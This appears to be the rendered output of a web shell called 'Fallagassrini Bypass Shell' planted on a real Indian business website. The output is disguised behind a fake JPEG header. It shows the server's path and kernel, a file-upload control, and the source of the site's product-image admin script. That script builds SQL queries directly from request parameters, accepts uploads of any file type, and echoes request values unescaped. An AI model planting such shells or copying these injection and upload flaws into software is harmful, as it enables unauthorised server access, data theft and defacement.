JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/tarinient/domains/tarinienterprises.in/public_html/admin/

Linux venus.ewebguru.net 4.18.0-553.44.1.el8_10.x86_64 #1 SMP Mon Mar 10 05:10:11 EDT 2025 x86_64
Upload File :
Current File : /home/tarinient/domains/tarinienterprises.in/public_html/admin/addmoreimg.php

<?php
session_start();
include('../configuration.php');
include("includes/php_devfunction.php");
check_userlogin();

if($_SERVER['REQUEST_METHOD']=="POST" && $_REQUEST["btnsubmit"]=="Save")
{
	 
	 //======== College photo =======================
	if($_FILES["usrphoto"]["size"]>0 && $_FILES["usrphoto"]["name"] !=" ") 
	{
		//=========== to upload the file =============		
		$photofile_name="";
		$uploaddir="../product_photo/";
		$uploadfrom = $_FILES["usrphoto"]["tmp_name"];
		   
		if (!preg_match("/(.+)\.(.*?)\Z/", $_FILES["usrphoto"]["name"], $matches)){
		  } 
			  $nr = 0;
			  $photofile_name = $matches[1] . '.' . $matches[2];
			  while(file_exists($uploaddir.$photofile_name)){
			  $photofile_name = $matches[1] . '~'. $nr++ .'.' . $matches[2];
		  }		
		$uploaddir = $uploaddir.$photofile_name; 
				
		move_uploaded_file($uploadfrom, $uploaddir);
	}
	else
	{
		$photofile_name=$_REQUEST["smimg1"];
	}
	
	
	if($_FILES["usrphoto1"]["size"]>0 && $_FILES["usrphoto1"]["name"] !=" ") 
	{
		//=========== to upload the file =============		
		$photofile_name1="";
		$uploaddir="../product_photo/";
		$uploadfrom = $_FILES["usrphoto1"]["tmp_name"];
		   
		if (!preg_match("/(.+)\.(.*?)\Z/", $_FILES["usrphoto1"]["name"], $matches)){
		  } 
			  $nr = 0;
			  $photofile_name1 = $matches[1] . '.' . $matches[2];
			  while(file_exists($uploaddir.$photofile_name1)){
			  $photofile_name1 = $matches[1] . '~'. $nr++ .'.' . $matches[2];
		  }		
		$uploaddir = $uploaddir.$photofile_name1; 
				
		move_uploaded_file($uploadfrom, $uploaddir);
	}
	else
	{
		$photofile_name1=$_REQUEST["smimg2"];
	}
	
	
	if($_FILES["usrphoto2"]["size"]>0 && $_FILES["usrphoto2"]["name"] !=" ") 
	{
		//=========== to upload the file =============		
		$photofile_name3="";
		$uploaddir="../product_photo/";
		$uploadfrom = $_FILES["usrphoto2"]["tmp_name"];
		   
		if (!preg_match("/(.+)\.(.*?)\Z/", $_FILES["usrphoto2"]["name"], $matches)){
		  } 
			  $nr = 0;
			  $photofile_name3 = $matches[1] . '.' . $matches[2];
			  while(file_exists($uploaddir.$photofile_name3)){
			  $photofile_name3 = $matches[1] . '~'. $nr++ .'.' . $matches[2];
		  }		
		$uploaddir = $uploaddir.$photofile_name3; 
				
		move_uploaded_file($uploadfrom, $uploaddir);
	}
	else
	{
		$photofile_name3=$_REQUEST["smimg3"];
	}
	
	if($_FILES["usrphoto3"]["size"]>0 && $_FILES["usrphoto3"]["name"] !=" ") 
	{
		//=========== to upload the file =============		
		$photofile_name4="";
		$uploaddir="../product_photo/";
		$uploadfrom = $_FILES["usrphoto3"]["tmp_name"];
		   
		if (!preg_match("/(.+)\.(.*?)\Z/", $_FILES["usrphoto3"]["name"], $matches)){
		  } 
			  $nr = 0;
			  $photofile_name4 = $matches[1] . '.' . $matches[2];
			  while(file_exists($uploaddir.$photofile_name4)){
			  $photofile_name4 = $matches[1] . '~'. $nr++ .'.' . $matches[2];
		  }		
		$uploaddir = $uploaddir.$photofile_name4; 
				
		move_uploaded_file($uploadfrom, $uploaddir);
	}
	else
	{
		$photofile_name4=$_REQUEST["smimg4"];
	}
	
	
	
	//======== College photo =======================
	if($_FILES["bigusrphoto"]["size"]>0 && $_FILES["bigusrphoto"]["name"] !=" ") 
	{
		//=========== to upload the file =============		
		$bigphotofile_name="";
		$uploaddir="../product_photo/";
		$uploadfrom = $_FILES["bigusrphoto"]["tmp_name"];
		   
		if (!preg_match("/(.+)\.(.*?)\Z/", $_FILES["bigusrphoto"]["name"], $matches)){
		  } 
			  $nr = 0;
			  $bigphotofile_name = $matches[1] . '.' . $matches[2];
			  while(file_exists($uploaddir.$bigphotofile_name)){
			  $bigphotofile_name = $matches[1] . '~'. $nr++ .'.' . $matches[2];
		  }		
		$uploaddir = $uploaddir.$bigphotofile_name; 
				
		move_uploaded_file($uploadfrom, $uploaddir);
	}
	else
	{
		$bigphotofile_name=$_REQUEST["bgimg1"];
	}
	 
	if($_FILES["bigusrphoto1"]["size"]>0 && $_FILES["bigusrphoto1"]["name"] !=" ") 
	{
		//=========== to upload the file =============		
		$bigphotofile_name1="";
		$uploaddir="../product_photo/";
		$uploadfrom = $_FILES["bigusrphoto1"]["tmp_name"];
		   
		if (!preg_match("/(.+)\.(.*?)\Z/", $_FILES["bigusrphoto1"]["name"], $matches)){
		  } 
			  $nr = 0;
			  $bigphotofile_name1 = $matches[1] . '.' . $matches[2];
			  while(file_exists($uploaddir.$bigphotofile_name1)){
			  $bigphotofile_name1 = $matches[1] . '~'. $nr++ .'.' . $matches[2];
		  }		
		$uploaddir = $uploaddir.$bigphotofile_name1; 
				
		move_uploaded_file($uploadfrom, $uploaddir);
	}
	else
	{
		$bigphotofile_name1=$_REQUEST["bgimg2"];
	} 
	 
	if($_FILES["bigusrphoto2"]["size"]>0 && $_FILES["bigusrphoto2"]["name"] !=" ") 
	{
		//=========== to upload the file =============		
		$bigphotofile_name2="";
		$uploaddir="../product_photo/";
		$uploadfrom = $_FILES["bigusrphoto2"]["tmp_name"];
		   
		if (!preg_match("/(.+)\.(.*?)\Z/", $_FILES["bigusrphoto2"]["name"], $matches)){
		  } 
			  $nr = 0;
			  $bigphotofile_name2 = $matches[1] . '.' . $matches[2];
			  while(file_exists($uploaddir.$bigphotofile_name2)){
			  $bigphotofile_name2 = $matches[1] . '~'. $nr++ .'.' . $matches[2];
		  }		
		$uploaddir = $uploaddir.$bigphotofile_name2; 
				
		move_uploaded_file($uploadfrom, $uploaddir);
	}
	else
	{
		$bigphotofile_name2=$_REQUEST["bgimg3"];
	} 
	
	if($_FILES["bigusrphoto3"]["size"]>0 && $_FILES["bigusrphoto3"]["name"] !=" ") 
	{
		//=========== to upload the file =============		
		$bigphotofile_name3="";
		$uploaddir="../product_photo/";
		$uploadfrom = $_FILES["bigusrphoto3"]["tmp_name"];
		   
		if (!preg_match("/(.+)\.(.*?)\Z/", $_FILES["bigusrphoto3"]["name"], $matches)){
		  } 
			  $nr = 0;
			  $bigphotofile_name3 = $matches[1] . '.' . $matches[2];
			  while(file_exists($uploaddir.$bigphotofile_name3)){
			  $bigphotofile_name3 = $matches[1] . '~'. $nr++ .'.' . $matches[2];
		  }		
		$uploaddir = $uploaddir.$bigphotofile_name3; 
				
		move_uploaded_file($uploadfrom, $uploaddir);
	}
	else
	{
		$bigphotofile_name3=$_REQUEST["bgimg4"];
	}  
	
	$sqlchk = "select * from tbl_otherimages where product_id='".$_REQUEST["cid"]."' ";
	$resck = $db->Execute($sqlchk);
	$totalchk  = $resck->RecordCount();
	
	if($totalchk>0)
	{
		$ins_emp = "update  tbl_otherimages set
				image1			= '".$photofile_name."',
				image2			= '".$photofile_name1."',
				image3			= '".$photofile_name3."',
				image4			= '".$photofile_name4."',
				big_img1		= '".$bigphotofile_name."',
				big_img2		= '".$bigphotofile_name1."',
				big_img3		= '".$bigphotofile_name2."',
				big_img4		= '".$bigphotofile_name3."' where product_id='".$_REQUEST["cid"]."' ";
				
			/*echo "<pre>";
			print_r($ins_emp);   	                 
			die;*/
			
		$ins_result = $db->Execute($ins_emp) or die(mysql_error());
	}
	else
	{
	
		$ins_emp = "insert into tbl_otherimages set
				product_id 		= '".$_REQUEST["cid"]."',				
				image1			= '".$photofile_name."',
				image2			= '".$photofile_name1."',
				image3			= '".$photofile_name3."',
				image4			= '".$photofile_name4."',
				big_img1		= '".$bigphotofile_name."',
				big_img2		= '".$bigphotofile_name1."',
				big_img3		= '".$bigphotofile_name2."',
				big_img4		= '".$bigphotofile_name3."' ";
				
			/*echo "<pre>";
			print_r($ins_emp);   	                 
			die;*/
			
		$ins_result = $db->Execute($ins_emp) or die(mysql_error());
	}
	
	if(ins_result)
	{
		url_redirect("manage_products.php?edit=5");
	}
}

$sqlapp = "select * from tbl_otherimages where product_id='".$_REQUEST["cid"]."' ";
$resapp = $db->Execute($sqlapp);
$totalapp  = $resapp->RecordCount();




?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title><?php echo PROJECT_TITLE;?></title>
	<link rel="stylesheet" type="text/css" href="css/text.css" />
    <link rel="stylesheet" type="text/css" href="css/grid.css"  />
    <link rel="stylesheet" type="text/css" href="css/layout.css"/>
    <link rel="stylesheet" type="text/css" href="css/nav.css"  />
    <link rel="stylesheet" type="text/css" href="css/reset.css" />
    <link href="css/demo_page.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="includes/jquery.js" type="text/javascript"></script>
<script language="javascript" src="includes/classified_ajax.js" type="text/javascript"></script>    
<script src="includes/javascript_function.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript">
//==== Validate form filled by user ================== 
function validateinfo()
{
	    
	var usrphoto=trim(document.frmcrm.usrphoto.value);
	var bigusrphoto=trim(document.frmcrm.bigusrphoto.value);
	
	//var username=trim(document.frmcrm.username.value);
	//var newpass=trim(document.frmcrm.newpass.value);
	//var confpass=trim(document.frmcrm.confpass.value);
	
	if(usrphoto=="")
	{
		alert('Please select image.');
		document.frmcrm.usrphoto.focus();
		return false;
	}
	else if(usrphoto!=="")
	{
		var ss;
		ss=1 + usrphoto.lastIndexOf(".");
		var ext =usrphoto.substr(ss);
		ext=ext.toLowerCase();
		if (!(ext == "gif" || ext == "jpeg"|| ext == "jpg"))
		{		
			alert('You can upload only doc or pdf file.');
			document.frmcrm.usrphoto.value="";
			document.frmcrm.usrphoto.focus();
			return false;
		}
	}
	if(bigusrphoto=="")
	{
		alert('Please select big image.');
		document.frmcrm.bigusrphoto.focus();
		return false;
	}
	else if(bigusrphoto!=="")
	{
		var ss;
		ss=1 + bigusrphoto.lastIndexOf(".");
		var ext =bigusrphoto.substr(ss);
		ext=ext.toLowerCase();
		if (!(ext == "gif" || ext == "jpeg"|| ext == "jpg"))
		{		
			alert('You can upload only doc or pdf file.');
			document.frmcrm.bigusrphoto.value="";
			document.frmcrm.bigusrphoto.focus();
			return false;
		}
	}
	
}
</script>
<!-- CAlendar Code here-->
<link type="text/css" href="calen/base/ui.all.css" rel="stylesheet" />
<script type="text/javascript" src="calen/jquery-1.3.2.js"></script>
<script type="text/javascript" src="calen/ui/ui.datepicker.js"></script>
<link type="text/css" href="calen/demos.css" rel="stylesheet" />
<script language="javascript" type="text/javascript">

$(function() {
			 
		$("#datepicker").datepicker({minDate: -30, maxDate: +30});
	});	

$(function() {
			 
		$("#datepicker1").datepicker({minDate: -30, maxDate: +30});
	});	
</script>
          
</head>

<body style="margin:0px; padding:0px;">
<div class="container_12">
        <div class="grid_12 header-repeat">
        <?php include("includes/service_top.php");?>
        </div>
        <div class="clear">
        </div>
        <?php //include("includes/topmenu.php");?>
        <div class="clear">
        </div>
        <div class="grid_2">
        <?php include("includes/leftmenu.php");?>    
        </div>
        <div class="grid_10">
            <div class="box round first">
                <h2>Add Product Other Images</h2>
                <div class="block">
                <!-- Table data start-->
<form name="frmcrm" id="frmcrm" action="" method="post" onsubmit="return validateinfo();" enctype="multipart/form-data">
<input type="hidden" name="cid" id="cid" value="<?php echo $_REQUEST["cid"];?>" />
<input type="hidden" name="smimg1" id="smimg" value="<?php echo $resapp->fields["image1"];?>" />
<input type="hidden" name="bgimg1" id="bgimg" value="<?php echo $resapp->fields["big_img1"];?>" />
<input type="hidden" name="smimg2" id="smimg" value="<?php echo $resapp->fields["image2"];?>" />
<input type="hidden" name="bgimg2" id="bgimg" value="<?php echo $resapp->fields["big_img2"];?>" />
<input type="hidden" name="smimg3" id="smimg" value="<?php echo $resapp->fields["image3"];?>" />
<input type="hidden" name="bgimg3" id="bgimg" value="<?php echo $resapp->fields["big_img3"];?>" />
<input type="hidden" name="smimg4" id="smimg" value="<?php echo $resapp->fields["image4"];?>" />
<input type="hidden" name="bgimg4" id="bgimg" value="<?php echo $resapp->fields["big_img4"];?>" />
<table width="100%" cellpadding="5" cellspacing="0" border="0" style="border:0px solid #999; border-collapse:collapse; font-size:12px;">
 <tr>
    <td valign="top">
    <fieldset style="border:1px solid #CCC; padding-left:10px;">
    <legend style="background-color:#CCC; color:#333; font-weight:bold; padding:6px;">Product Other Details</legend>
    <table border="0" width="95%" style="background-image:none; border:none;">
    <tr>    
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>Small Image1 (300x425) : </b></label></td>
    <td><input type="file" name="usrphoto" id="usrphoto" class="mini" onkeypress="return false"  /></td>
    </tr>
     <tr>
    <td align="right"><label><b><span class="requfield">*</span>Big Image1 (500x708) : </b></label></td>
    <td><input type="file" name="bigusrphoto" id="bigusrphoto" class="mini" onkeypress="return false"  /></td>
    </tr>
    <tr>
    <td align="right"><label><b>Small Image2 (300x425) : </b></label></td>
    <td><input type="file" name="usrphoto1" id="usrphoto1" class="mini" onkeypress="return false"  /></td>
    </tr>
     <tr>
    <td align="right"><label><b>Big Image2 (500x708) : </b></label></td>
    <td><input type="file" name="bigusrphoto1" id="bigusrphoto1" class="mini" onkeypress="return false"  /></td>
    </tr>
    <tr>
    <td align="right"><label><b>Small Image3 (300x425) : </b></label></td>
    <td><input type="file" name="usrphoto2" id="usrphoto2" class="mini" onkeypress="return false"  /></td>
    </tr>
     <tr>
    <td align="right"><label><b>Big Image3 (500x708) : </b></label></td>
    <td><input type="file" name="bigusrphoto2" id="bigusrphoto2" class="mini" onkeypress="return false"  /></td>
    </tr>
    <tr>
    <td align="right"><label><b>Small Image4 (300x425) : </b></label></td>
    <td><input type="file" name="usrphoto3" id="usrphoto3" class="mini" onkeypress="return false"  /></td>
    </tr>
     <tr>
    <td align="right"><label><b>Big Image4 (500x708) : </b></label></td>
    <td><input type="file" name="bigusrphoto3" id="bigusrphoto3" class="mini" onkeypress="return false"  /></td>
    </tr>
    <tr>
    <td colspan="2" height="20"></td>
    </tr>
    <tr>
    <td align="right">&nbsp;</td>
    <td>
    <input class="submit-green" name="btnsubmit" id="btnsubmit" type="submit" value="Save" />
    </td>
    </tr>  
    <tr>
    <td align="center"><b>Small Image</b></td>
    <td align="left"><b>Big Image</b></td>
    </tr> 
    <tr>
    <td align="center">
	<?php if(!empty($resapp->fields["image1"])){?>
    <img src="<?php echo "../product_photo/".$resapp->fields["image1"];?>" border="0" width="30" height="30" />
    <?php }?>
    </td>
    <td align="left">
	<?php if(!empty($resapp->fields["big_img1"])){?>
    <img src="<?php echo "../product_photo/".$resapp->fields["big_img1"];?>" border="0" width="300" height="300" />
    <?php }?>
    </td>
    </tr> 
    <tr>
    <td align="center">
	<?php if(!empty($resapp->fields["image2"])){?>
    <img src="<?php echo "../product_photo/".$resapp->fields["image2"];?>" border="0" width="30" height="30" />
    <?php }?>
    </td>
    <td align="left">
	<?php if(!empty($resapp->fields["big_img2"])){?>
    <img src="<?php echo "../product_photo/".$resapp->fields["big_img2"];?>" border="0" width="300" height="300" />
    <?php }?>
    </td>
    </tr> 
    <tr>
    <td align="center">
	<?php if(!empty($resapp->fields["image3"])){?>
    <img src="<?php echo "../product_photo/".$resapp->fields["image3"];?>" border="0" width="30" height="30" />
    <?php }?>
    </td>
    <td align="left">
	<?php if(!empty($resapp->fields["big_img3"])){?>
    <img src="<?php echo "../product_photo/".$resapp->fields["big_img3"];?>" border="0" width="300" height="300" />
    <?php }?>
    </td>
    </tr> 
    <tr>
    <td align="center">
	<?php if(!empty($resapp->fields["image4"])){?>
    <img src="<?php echo "../product_photo/".$resapp->fields["image4"];?>" border="0" width="30" height="30" />
    <?php }?>
    </td>
    <td align="left">
	<?php if(!empty($resapp->fields["big_img4"])){?>
    <img src="<?php echo "../product_photo/".$resapp->fields["big_img4"];?>" border="0" width="300" height="300" />
    <?php }?>
    </td>
    </tr> 
    </table>
    </fieldset>
    </td>
  </tr>
</table>
</form>	               
                <!-- Table data end-->
                </div>
            </div>
            
        </div>
        
        
        <div class="clear">
        </div>
    </div>
    <div class="clear">
    </div>
    <?php include("includes/footer.php");?>
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net